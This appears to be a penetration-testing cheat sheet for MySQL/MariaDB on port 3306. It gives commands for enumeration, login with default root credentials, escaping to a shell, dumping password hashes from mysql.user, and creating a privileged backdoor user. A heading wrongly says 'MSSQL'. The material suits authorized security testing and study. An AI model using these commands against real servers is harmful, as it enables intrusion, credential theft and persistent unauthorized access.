Port 3306 - MySQL/MariaDB

MySQL is commonly found running on either windows or linux servers. The original MySQL solution was bought by Oracle, the previous open-source variant was forked and is referred to as MariaDB.

Default credentials are often set to root:, within some instances as per the example not requiring a password.

MySQL/MariaDB Scanning and Enumeration

Tool	Script/Module	Auth	MITRE ATT&CK Tactic	Command
MSF	mysql_enum	Y	Reconnaissance
Nmap	mysql-info	N	Reconnaissance	sudo nmap -A -p 3306 -n 10.10.10.10

MySQL/MariaDB Exploitation

MSSQL Database Interaction

The MySQL command line tool can be used to interface with a remote MySQL/MariaDB instance.

# Accessing a Remote Server
mysql -h 10.10.10.10 -u root
mysql -h 10.10.10.10 -u root -e 'show databases;'

# Database Interaction
show databases; # Shows all available databases
use %DATABASE%; # Enter a select database
show tables; # Show tables under a select database
describe %TABLE%; # Show details of a select table
select * from %TABLE% # Show all stored data under a select table

# Exploitation
\! sh # Drop into a shell
mysql -h 10.10.10.10 -u root --password=%PASSWORD% -e "SELECT * FROM mysql.user;" # Credential Dumping
create user test identified by 'test'; # Create a new user and assign admin privileges
grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;